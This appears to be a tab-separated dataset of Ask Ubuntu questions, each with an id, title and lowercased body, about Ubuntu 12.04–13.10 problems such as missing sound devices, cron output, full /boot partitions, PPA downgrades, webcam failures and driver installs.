363631	no output devices in sound settings - therefore , no sound	i 've just performed a fresh install of ubuntu 13.10 , and i 've noticed that sound is n't working . when i go to sound settings , i can see that there is absolutely no sound devices detected . however , i do have my speakers installed and turned on , plus my machine has an internal speaker as well . i 've seen other posts where people mention that they have `` dummy device '' listed , this is n't the problem here , the output device section is completely blank . any help is appreciated . thanks , kev
363632	cron is running but not providing output data	i 'm trying to make my amazon ec2 instances stop and start by a crontab . ec2 api tools is succesfully installed . manually it works . the cron ( which i put in with the command crontab -e ) : 10 * * * * ubuntu /usr/bin/ec2-stop-instances [ instanceid ] > /tmp/ec2.log the file /tmp/ec2.log is created . when i use the command grep cron /var/log/syslog i see the cron has actually run . i do n't get any output in the /tmp/ec2.log file though . i have set all the amazon variables needed . even if i on purpose create a wrong cron , like this : 10 * * * * ubuntu /usr/bin/ec2-stop-instancwweqes [ instanceid ] > /tmp/ec2.log i get no output in the file . should n't there be an error ? i also tried not defining the user : 10 * * * * /usr/bin/ec2-stop-instances [ instanceid ] > /tmp/ec2.log and direct command : 10 * * * * ubuntu ec2-stop-instances [ instanceid ] > /tmp/ec2.log can someone please help me . if i can somehow debug , i can get to the solution .
363634	what should i do before i upgrade from 13.04 to 13.10 ?	the question title says it all . what should one do before upgrading from 13.04 to 13.10 ?
363639	how to share my usb modem 's internet connection in ubuntu 12.04 ?	i am using ubuntu 12.04 on my notebook and my primary internet connection is reliance netconnect . i want to share it on my android smartphone , but have no idea about sharing usb modem on linux . i was able to share the same on windows 7 using the software provided by the notebook manufacturer . again it 's my bad luck that the manufacturer ( samsung ) does not provides any device driver or software for notebook for linux os they only provide it for windows os , but still some of the features work same as on windows without any driver or software . please help me .
363642	what keyboard layout does my macbook 7.1 have ?	i have a weird keyboard i guess what layout is it ? i ca n't find it in ubuntu 's keyboard layout setings .
363644	can i delete `` generic '' kernel if i use `` low latency '' ?	i currently ca n't update my release as there is not enough space on boot . i just have the one kernel version there , but seem to have both the generic and low latency versions . uname -r just shows 3.8.0-32-lowlatency ls -lah /boot shows -rw-r -- r -- 1 root root 899k oct 2 00:00 abi-3.8.0-32-generic -rw-r -- r -- 1 root root 899k oct 7 09:27 abi-3.8.0-32-lowlatency -rw-r -- r -- 1 root root 152k oct 2 00:00 config-3.8.0-32-generic -rw-r -- r -- 1 root root 152k oct 7 09:27 config-3.8.0-32-lowlatency drwxr-xr-x 3 root root 2.0k jan 1 1970 efi drwxr-xr-x 5 root root 1.0k oct 22 10:05 grub -rw-r -- r -- 1 root root 32m oct 22 09:51 initrd.img-3.8.0-32-generic -rw-r -- r -- 1 root root 32m oct 22 10:05 initrd.img-3.8.0-32-lowlatency drwxr-xr-x 2 root root 12k feb 25 2013 lost+found -rw-r -- r -- 1 root root 173k dec 5 2012 memtest86+.bin -rw-r -- r -- 1 root root 175k dec 5 2012 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3.0m oct 2 00:00 system.map-3.8.0-32-generic -rw -- -- -- - 1 root root 3.0m oct 7 09:27 system.map-3.8.0-32-lowlatency -rw -- -- -- - 1 root root 5.2m oct 2 00:00 vmlinuz-3.8.0-32-generic -rw -- -- -- - 1 root root 5.2m oct 7 09:27 vmlinuz-3.8.0-32-lowlatency so what can i do to allow me to update ? apparently i need 174m on boot and am 40m short .
363646	rhythmbox is not launching	i 'm using rhythmbox 2.99 in ubuntu 13.10 , and when i first launch the application it searches for music and works like a charm , but if i try to launch it later again nothing happens . when i run it in terminal i get this : $ rhythmbox ( rhythmbox:8860 ) : glib-gobject-critical ** : custom constructor for class soupserver returned null ( which is invalid ) . unable to remove object from construction_objects list , so memory was probably just leaked . please use ginitable instead . segmentation fault any ideas how to make it work again ? the output of sudo dpkg -l | grep rhythmbox : ii gir1.2-rb-3.0 2.99.1-0ubuntu1 amd64 gobject introspection data for the rhythmbox music player ii librhythmbox-core7 2.99.1-0ubuntu1 amd64 support library for the rhythmbox music player ii rhythmbox 2.99.1-0ubuntu1 amd64 music player and organizer for gnome ii rhythmbox-data 2.99.1-0ubuntu1 all data files for rhythmbox ii rhythmbox-mozilla 2.99.1-0ubuntu1 amd64 rhythmbox mozilla plugin ii rhythmbox-plugin-cdrecorder 2.99.1-0ubuntu1 amd64 burning plugin for rhythmbox music player ii rhythmbox-plugin-equalizer 0.3-2 all rhythmbox sound equalizer ii rhythmbox-plugin-zeitgeist 2.99.1-0ubuntu1 all zeitgeist plugin for rhythmbox music player ii rhythmbox-plugins 2.99.1-0ubuntu1 amd64 plugins for rhythmbox music player
363647	gnome3 favorites bar moves to middle	every time i install ubuntu and gnome3 ( from 12.10 to 13.10 , no matter updating or re-installing , even running in virtual machines ) , i will meet the problem . after start up the system for several hours , the favorites bar may move to the middle ( it stays on the left at the beginning ) and may be covered by the application thumbnails . ( sorry but i have n't got enough reputation to post the snapshots .
363649	maas - ubuntu 12.04.3 - add node but with error	yesterday i 've installed a maas service on an ubuntu 12.04.3 lts server edition , the all installation was right the only error i received was when i added a node . the node has been added to maas but if i try to select it from ui see this error ; ; connection timed out ; no servers could be reached someone can help me to resolve that ? thanks a lot
363650	since upgrading to 13.10 i lost the ability to access network resources	since upgrading to ubuntu 13.10 , i am unable to access network resources . the procedure i 'm following is this ; open files click on browse network click on windows network as soon i perform the last step the window close and nothing happens or it displays that ubuntu encountered an issue etc ... i never experienced such issue with ubuntu 12.04 lts . is this a know 13.10 bug ?
363653	remove all packages installed from a ppa ?	i have installed libreoffice 4 using ppa . i was using libreoffice 3 , then i had upgraded to libreoffice 4 , because i was somewhat eager to try a new version . now since i found that libreoffice 4 has some issues , including handling my native language , i want to move back to libreoffice 3 . this question how to downgrade from libreoffice 4.0 to 3.6 ? has already some answers which has some similarity with my above mentioned issue , but it does not solve my problem . this question talks about downgrading from a specific version of libreoffice , namely from 4.0 to 3.6 . the solutions mentioned are not the ones i am looking for . they will work , but the solutions suggest either downloading .deb files for libreoffice 3.6 or adding ppa for them . furthermore , some of the answers put out-of-proportion~ ( applicable for the solution , however ) stress on use of synaptic , not general command-line-solution . i want a general solution without using ppa or downloading .deb files . all i want is to move back from the ( higher ) ppa version to the ( lower ) official version . anyway , in order to accomplish this , i removed the libreoffice config directory from my home and then purged libreoffice from my machine . sudo apt-get purge libreoffice-* then i removed the relevant ppa 's using the sudo apt-add-repository -- remove command . and then ran sudo apt-get update . now , when i try to install libreoffice using the command sudo apt-get install libreoffice i get an avalanche of output about unmet dependencies , something like , the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.5.7-0ubuntu4 ) but it is not going to be installed ( snipped ) if i dig the issue further , by using the command , sudo apt-get install libreoffice-core i get the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:3.5.7 ) but it is not going to be installed depends : libexttextcat0 ( > = 2.2-8 ) but it is not going to be installed depends : ure ( > = 3.5.7~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . could you please tell me how do i install libreoffice 3 in my machine ? i am using ubuntu 12.04 lts . edit before receiving the accepted answer , i was wondering , at this very moment , if i take a fresh computer , and install ubuntu 12.04 , libreoffice installation will work without a hitch . then why i can not install libreoffice in my 12.04 machine today from simple command line ? then the accepted answer clarified everything . i need to use ppa-purge so that this resets all packages from a ppa to the standard versions released for my distribution . basically it is like a way to restore my system back to the way it was before my installed packages from a ppa . this article further elaborates the idea . the above mentioned answer worked perfectly for me . actually , this was an education for me since it taught me how do downgrade a package that was added via ppa . and i realized that the answer actually teaches us to `` move from ppa installation of a package to official lower version package . ''
363661	dell xps 15 ( l502x ) integrated webcam not working	i installed ubuntu 12.04 x64 on the dell xps 15 l502x but the integrated webcam is not working neither with cheese nor skype . learned that there is no need to install drivers for this version ( 12.04 ) already has support for this device type . below is some information about my machine : distrib_description= '' ubuntu 12.04.3 lts '' 3.8.0-31-generic details of webcam bus 001 device 003 : id 0408:1802 quanta computer , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 239 miscellaneous device bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 idvendor 0x0408 quanta computer , inc. idproduct 0x1802 bcddevice 1.00 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 some important sections of dmesg [ 1.672968 ] usb 1-1.4 : new high-speed usb device number 3 using ehci-pci [ 1.767697 ] usb 1-1.4 : config 1 interface 0 altsetting 0 endpoint 0x81 has an invalid binterval 32 , changing to 9 [ 1.770688 ] usb 1-1.4 : new usb device found , idvendor=0408 , idproduct=1802 [ 1.770694 ] usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.770699 ] usb 1-1.4 : product : webcam [ 1.770703 ] usb 1-1.4 : manufacturer : quanta [ 1.770707 ] usb 1-1.4 : serialnumber : 1802 [ 7.241208 ] uvcvideo : found uvc 1.00 device webcam ( 0408:1802 ) [ 7.241210 ] uvcvideo : forcing device quirks to 0x100 by module parameter for testing purpose . [ 7.241211 ] uvcvideo : please report required quirks to the linux-uvc-devel mailing list . [ 7.242188 ] input : webcam as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/input/input7 [ 7.242257 ] usbcore : registered new interface driver uvcvideo [ 7.242259 ] usb video class driver ( 1.1.1 ) [ 7.466426 ] [ drm ] memory usable by graphics device = 2048m [ 7.466433 ] i915 0000:00:02.0 : setting latency timer to 64 [ 7.503003 ] i915 0000:00:02.0 : irq 50 for msi/msi-x [ 7.503012 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 7.503013 ] [ drm ] driver supports precise vblank timestamp query . [ 7.503113 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 7.503115 ] vgaarb : transferring owner from pci:0000:00:02.0 to pci:0000:01:00.0 [ 2646.402855 ] uvcvideo : uvc_v4l2_open [ 2646.497988 ] uvcvideo : resuming interface 0 [ 2646.497997 ] uvcvideo : resuming interface 1 [ 2651.490471 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 2651.490492 ] uvcvideo 1-1.4:1.1 : resume error -5 [ 2651.490547 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querycap ) [ 2651.490853 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_fmt ) [ 2651.490867 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_framesizes ) [ 2651.490878 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_frameintervals ) [ 2651.490889 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_frameintervals ) [ 2651.490899 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_framesizes ) [ 2651.490906 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_enum_fmt ) [ 2651.490920 ] uvcvideo : uvc_v4l2_release [ 2653.926600 ] uvcvideo : suspending interface 1 [ 2653.926607 ] uvcvideo : suspending interface 0 [ 2660.729384 ] uvcvideo : uvc_v4l2_open [ 2660.824885 ] uvcvideo : resuming interface 0 [ 2660.824895 ] uvcvideo : resuming interface 1 [ 2665.817299 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 2665.817317 ] uvcvideo 1-1.4:1.1 : resume error -5 [ 2665.817373 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_fmt ) [ 2665.817388 ] uvcvideo : trying format 0x56595559 ( yuyv ) : 640x480 . [ 2665.817393 ] uvcvideo : using default frame interval 33333.3 us ( 30.0 fps ) . [ 2670.809759 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2670.809782 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_parm ) [ 2670.809795 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_parm ) [ 2670.809802 ] uvcvideo : setting frame interval to 1/30 ( 333333 ) . [ 2675.802355 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2675.802386 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_ctrl ) [ 2675.802399 ] uvcvideo : control 0x009a0903 not found . [ 2675.802405 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2676.858511 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2676.858530 ] uvcvideo : uvc_v4l2_mmap [ 2676.871661 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2676.871675 ] uvcvideo : uvc_v4l2_mmap [ 2676.883574 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2676.883586 ] uvcvideo : uvc_v4l2_mmap [ 2676.894678 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2676.894689 ] uvcvideo : uvc_v4l2_mmap [ 2676.908659 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2676.908668 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2676.908670 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2676.908672 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2676.908673 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamon ) [ 2681.901338 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 2681.950377 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2682.013994 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamoff ) [ 2682.014003 ] uvcvideo : uvc_v4l2_release [ 2682.016511 ] uvcvideo : uvc_v4l2_open [ 2682.016525 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_fmt ) [ 2682.016529 ] uvcvideo : trying format 0x56595559 ( yuyv ) : 640x480 . [ 2682.016531 ] uvcvideo : using default frame interval 33333.3 us ( 30.0 fps ) . [ 2687.005831 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2687.005858 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_parm ) [ 2687.005872 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_parm ) [ 2687.005879 ] uvcvideo : setting frame interval to 1/30 ( 333333 ) . [ 2691.998370 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2691.998399 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_ctrl ) [ 2691.998411 ] uvcvideo : control 0x009a0903 not found . [ 2691.998416 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2692.627817 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2692.627832 ] uvcvideo : uvc_v4l2_mmap [ 2692.639839 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2692.639849 ] uvcvideo : uvc_v4l2_mmap [ 2692.650616 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2692.650626 ] uvcvideo : uvc_v4l2_mmap [ 2692.661232 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2692.661242 ] uvcvideo : uvc_v4l2_mmap [ 2692.672922 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2692.672930 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2692.672932 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2692.672934 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2692.672935 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamon ) [ 2697.665882 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 2697.714087 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2697.776261 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamoff ) [ 2697.776274 ] uvcvideo : uvc_v4l2_release [ 2697.778966 ] uvcvideo : uvc_v4l2_open [ 2697.779010 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_fmt ) [ 2697.779026 ] uvcvideo : trying format 0x56595559 ( yuyv ) : 640x480 . [ 2697.779032 ] uvcvideo : using default frame interval 33333.3 us ( 30.0 fps ) . [ 2702.770258 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2702.770288 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_parm ) [ 2702.770302 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_parm ) [ 2702.770310 ] uvcvideo : setting frame interval to 1/30 ( 333333 ) . [ 2707.762786 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 2707.762817 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_ctrl ) [ 2707.762830 ] uvcvideo : control 0x009a0903 not found . [ 2707.762835 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2708.394107 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2708.394121 ] uvcvideo : uvc_v4l2_mmap [ 2708.406717 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2708.406729 ] uvcvideo : uvc_v4l2_mmap [ 2708.417305 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2708.417317 ] uvcvideo : uvc_v4l2_mmap [ 2708.428584 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 2708.428596 ] uvcvideo : uvc_v4l2_mmap [ 2708.439363 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2708.439371 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2708.439373 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2708.439374 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 2708.439376 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamon ) [ 2713.430305 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 2713.484104 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 2713.545305 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamoff ) [ 2713.545317 ] uvcvideo : uvc_v4l2_release [ 2715.818485 ] uvcvideo : suspending interface 1 [ 2715.818495 ] uvcvideo : suspending interface 0 [ 3130.731506 ] uvcvideo : uvc_v4l2_open [ 3130.824774 ] uvcvideo : resuming interface 0 [ 3130.824784 ] uvcvideo : resuming interface 1 [ 3135.816983 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 3135.816991 ] uvcvideo 1-1.4:1.1 : resume error -5 [ 3135.817016 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_fmt ) [ 3135.817021 ] uvcvideo : trying format 0x56595559 ( yuyv ) : 640x480 . [ 3135.817023 ] uvcvideo : using default frame interval 33333.3 us ( 30.0 fps ) . [ 3140.809638 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 3140.809648 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_parm ) [ 3140.809653 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_s_parm ) [ 3140.809655 ] uvcvideo : setting frame interval to 1/30 ( 333333 ) . [ 3145.802167 ] uvcvideo : failed to set uvc probe control : -110 ( exp . 26 ) . [ 3145.802179 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_g_ctrl ) [ 3145.802183 ] uvcvideo : control 0x009a0903 not found . [ 3145.802186 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 3146.489728 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 3146.489743 ] uvcvideo : uvc_v4l2_mmap [ 3146.503109 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 3146.503125 ] uvcvideo : uvc_v4l2_mmap [ 3146.514360 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 3146.514371 ] uvcvideo : uvc_v4l2_mmap [ 3146.525725 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_querybuf ) [ 3146.525737 ] uvcvideo : uvc_v4l2_mmap [ 3146.537092 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 3146.537102 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 3146.537103 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 3146.537105 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_qbuf ) [ 3146.537106 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamon ) [ 3151.529598 ] uvcvideo : failed to set uvc commit control : -110 ( exp . 26 ) . [ 3151.573946 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_reqbufs ) [ 3151.639134 ] uvcvideo : uvc_v4l2_ioctl ( vidioc_streamoff ) [ 3151.639147 ] uvcvideo : uvc_v4l2_release [ 3154.181504 ] uvcvideo : suspending interface 1 [ 3154.181516 ] uvcvideo : suspending interface 0 it seems to me that it is some port conflict or something .
363662	vicious circle between `` sudo dpkg -- reconfigure -a '' and `` kernel panic ''	i am using ubuntu 13.04 , today i run software manager , it listed lots of stuff around 250mb including new kernel 3.8.0-32 and while installing them kernel panic occured , i shut down my laptop on power button . then i restarted it , it successfully loaded session but when i open synaptic i get : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . when i run it kernel panic occur again , it happens while it 's configuring `` libc '' or something like that . please help ! ! ! edit : uname -r gives me still 3.8.0-31 version of the kernel . edit2 : it 's obviously a libc configuration problem , so now how can i revert it back to previous version ? related packages in cache : libc6_2.17-0ubuntu5.1_i386.deb , libc6-dev_2.17-0ubuntu5.1_i386.deb , libc-dev-bin_2.17-0ubuntu5.1_i386.deb , linux-libc-dev_3.8.0-32.47_i386.deb is it possible to downgrade them while getting sudo dpkg -- configure -a error ? edit3 : i run sudo dpkg-reconfigure linux-image-3.8.0-31-generic it could configure the previous kernel , so it 's not kernel upgrade issue .
363667	beep sound after pressing enter too many times	so i pressed enter in terminal repeatedly and then computer started beeping . but it beeps when i turn music on or any video where is sound . how can i turn it off , it 's annoying ? ..
363673	hot corners issue : toggle desktop works one time after restart	toggle desktop hot corner stops after one attempt but window spread still works ?
363674	installing ubuntu 13.10 64 bit with windows 8.1 32 bit ?	i have windows 8.1 pro 32bit installed in my laptop . my question is can i install ubuntu 13.10 64bit alongside windows 8.1 pro which is a 32bit os . i do n't know whether a 32 bit os and a 64 bit os can be installed alongside . or should i have to go with 32 bit ?
363678	ubuntu desktop to ubuntu touch on nexus 7 1st generation	i am currently running ubuntu desktop on my nexus 7 1st generation . what is the procedure to install ubuntu touch ? do i have to go back to android to install ?
363679	why make file is not generated while installing mvapich2	i am installing mvapich2 on my pc following the instructions given here but after ./configure i must have makefile . i did ls and found that no such file is there . because of this make is not working . what should i do to solve this issue ? i am using ubuntu 12.04 . update root @ ubuntu : /home # lspci -nnk | grep -i net -a2 01:07.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:301d ] kernel driver in use : 8139too based on the suggestions by radu rädeanu i tried : ./configure -- with-device=ch3 : sock still no makefile is generating so my make is not working . i can see a src folder , so when i go there i found one makefile.mk . but even there make is not working . says : root @ ubuntu : /home/acme/downloads/mvapich2-2.0a/src # make make : *** no targets specified and no makefile found . stop .
363680	changing a start up init.d script to use with new ubuntu	this is my code . i would like to change it to use with new versions of ubuntu . the thing is ubuntu does n't have chkconfig any more . also i heard that new ubuntu uses upstart instead of init type start ups . so how can i use this code to use with ubuntu 13.10 ? # ! /bin/sh # chkconfig : 2345 99 01 # description : softether vpn server daemon=/usr/local/vpnserver/vpnserver lock=/var/lock/subsys/vpnserver test -x $ daemon || exit 0 case `` $ 1 '' in start ) $ daemon start touch $ lock ; ; stop ) $ daemon stop rm $ lock ; ; restart ) $ daemon stop sleep 3 $ daemon start ; ; * ) echo `` usage : $ 0 { start|stop|restart } '' exit 1 esac exit 0
363683	upgrade 13.04 to 13.10	after upgrading 13.04 to 13.10 i have no keyboard . fresh install of 13.04 and the keyboard is back , fresh install of 13.10 and no keyboard . the laptop is an older lw40 1.8 ghz 2gb ram . a usb keyboard works fine but defeats having the laptops portability . oddly fedora 19 has the same impact on the keyboard . any suggestions appreciated .
363688	nautilus hangs up on mounted shares after suspend	after establishing a vpn tunnel to my university , i connect to a network share via shell script like this : sudo mount -t cifs -o username=xyz , password=abc //10.x.x.x/xyz /media/my_share/ it works fine but when i suspend my laptop and later start it up again , the shares wo n't work anymore . nautilus hangs up when i click on them . the vpn connection always disconnects when suspending so i reconnect when starting up again . maybe it has something to do with that ? has anybody experienced similar issues and can give me some advice ? maybe there is some way to automatically umount all network-shares when suspending ? i saw this post here about umounting when shuting down ( anyhow it seems also not to work for me ) . any advice would be helofull ! best !
363691	localhost port aliased	i wanted to use /etc/hosts to define `` aliases '' for multiple services localhosted like : 127.0.0.1 localhost 127.0.0.1:8080 machin 127.0.0.1:8081 truc but it does n't seem to work , surely because /etc/hosts has nothing to do with ports is there a way to alias these ports ?
363692	installation of ubuntu off line and alongside windows xp	can 'ubuntu ' be installed off line and continue to also operate off line ? after downloading ubuntu or before downloading it , how can i make it to be on auto run format for easy set up command ?
363694	nvidia 520mx graphics card on asus k53sc	i 'm sorry if it is possibly a double post , but i could not find a solution anywhere . i have tried over and over again to install nvidia driver on my ubuntu 13.10 laptop , considering that it should be fairly easy with optimus ( and considering that i never succeeded using bumblebee ) , but once i install them and restart the machine , there are a lot of system errors and the visual effects are completely gone ( even though the system recognizes my exact graphic card ) and i have to install them because if i do n't my pc overheats.. what can i do ? the command i used is : sudo apt-get install nvidia-319 nvidia-settings-319 nvidia-prime and after that it all goes to waste . thanks in advance for your attention .
363697	how do i install ubuntu on an external hard drive alongside my windows 8.1 ?	how do i install ubuntu on windows 8.1 alongside my external hard drive ?
363698	newbie can not fix display resolution persistently	i am running 12.04 on a dell 5430 laptop with external dell monitor as a real newbie . my monitor is running at 1152x864 rather than the 1920x1080 that is capable of . i have followed the various posts and , using xrandr , have set the resolution to 1920x1080 successfully . to make it persistent different posts suggest updating /etc/x11/xorg.conf or /etc/gdm/init/default or /etc/kde4/kdm/init/default . however i can not find any of those files in /etc . where do i add a new modeline to make the resolution change persistent ?
363699	g77 on ubuntu 12.04	i use a 32 bit machine ... . and installed g77 package ... when i run g77 command it gives following error ... /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status there is solution in couple of links but am new to ubuntu and so cant understand . please help fix this ... thanks
363701	how do i remove duckduckgo lens from dash ?	installed it using these commands in a terminal : sudo add-apt-repository ppa : w-vollprecht/ppa sudo apt-get update sudo apt-get install duckduckgo-lens what do i do to remove it ?
363705	no sound after upgrade from 13.04	after my upgrade to 13.10 i ca n't use my spdif output anymore , and in addition to that i 'm facing other problems with sound : my sound panel is totally gone when opening sound settings i ca n't choose any output but alsamixer recognizes my sound card aplay -l shows following : liste der hardware-geräte ( playback ) home directory not accessible : keine berechtigung karte 0 : mid [ hda intel mid ] , gerät 0 : alc888 analog [ alc888 analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : mid [ hda intel mid ] , gerät 1 : alc888 digital [ alc888 digital ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : nvidia [ hda nvidia ] , gerät 3 : hdmi 0 [ hdmi 0 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : nvidia [ hda nvidia ] , gerät 7 : hdmi 0 [ hdmi 0 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : nvidia [ hda nvidia ] , gerät 8 : hdmi 0 [ hdmi 0 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : nvidia [ hda nvidia ] , gerät 9 : hdmi 0 [ hdmi 0 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 i hope anyone of you can help me
363708	can not boot ubuntu with new kernel	my host operating system is windows 7 . i have installed vmware over it . and was running ubuntu 10.04lts using vmware . but today out of curiosity , i downloaded new kernel 3.10.1 compiled it and installed it using commands : make menuconfig , make -j32 , make modules_install , make install here after installation i could n't find initrd image in /boot location , so i copied a initrd image from another system over which i earlier installed 3.10.1 kernel . and then i modified my grub.cfg , so that it could have a entry for new kernel . but after restart , i am only seeing a blank screen over vmware and nothing else . could somebody point out what should i do now to recover my system . is my ubuntu os is 10.04 and i have installed 3.10.1 is the issue or initrd copied from another machine has resulted in this problem
363709	videos do n't play correctly in firefox in ubuntu	video attempts to play , but it shows up only on the left half of the video window . the right half of the video window is just colored horizontal lines
363711	rhythmbox on ubuntu 13.10	since i upgraded to 13.10 , i can not export cd tracks in rhythmbox . it told me `` additional software is required to encode media in your preferred format : vorbis encoder '' i click install , and it loops back and does not work . i un-installed rhythmbox , re-installed it , and it still does not work . now when i click install , i get `` invalid commandline . the parameters passed to the application had an invalid format . please file a bug ! the parameters were : -- transient-for=65011715 gstreamer|1.0|rhythmbox|vorbis encoder|encoder-audio/x-vorbis '' i also renamed the rhythmbox folders in ~/.cache and ~/.local - this also made new difference . is this a bug , or do i have something set up incorrectly here ? if it makes a difference , i am running on a dell d630 .
363712	wrong theme with kdesudo	a while ago i installed kubuntu on ubuntu ( then 12.10 ) with sudo apt-get install kubuntu-desktop . ever since i 've got a problem when running some gui applications as root . for example when running sudo synaptics the theme is right ( oxygen ) , whereas with kdesudo synaptics the ambiance theme from unity is displayed . any solutions ?
